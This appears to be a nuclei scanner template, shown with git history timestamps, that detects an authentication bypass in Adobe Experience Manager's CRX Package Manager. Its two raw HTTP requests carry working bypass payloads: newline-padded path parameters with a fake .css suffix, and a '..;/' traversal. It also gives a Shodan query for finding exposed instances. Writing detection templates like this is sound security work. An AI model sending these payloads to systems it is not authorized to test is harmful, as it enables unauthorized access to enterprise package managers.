nuclei-templates/http/misconfiguration/aem/aem-crx-bypass.yaml

49 lines
1.6 KiB
YAML
Raw Normal View History

2021-06-28 14:50:58 +00:00
id: aem-crx-bypass
2021-06-28 14:53:11 +00:00
info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
2021-06-28 14:50:58 +00:00
severity: critical
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
2022-07-26 03:37:51 +00:00
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe
2021-06-28 14:50:58 +00:00
http:
2021-06-28 14:50:58 +00:00
- raw:
- |
2021-07-01 16:53:08 +00:00
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
2021-06-28 14:50:58 +00:00
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
2021-06-28 15:14:24 +00:00
2021-07-01 16:53:08 +00:00
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
2021-07-03 19:52:08 +00:00
2021-06-28 15:14:24 +00:00
matchers-condition: and
2021-06-28 14:50:58 +00:00
matchers:
- type: word
2021-06-28 15:14:24 +00:00
part: body
words:
2021-07-01 16:53:08 +00:00
- 'buildCount'
- 'downloadName'
- 'acHandling'
2021-06-28 15:14:24 +00:00
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
2021-07-01 16:53:08 +00:00
- 200
# Enhanced by mp on 2022/04/22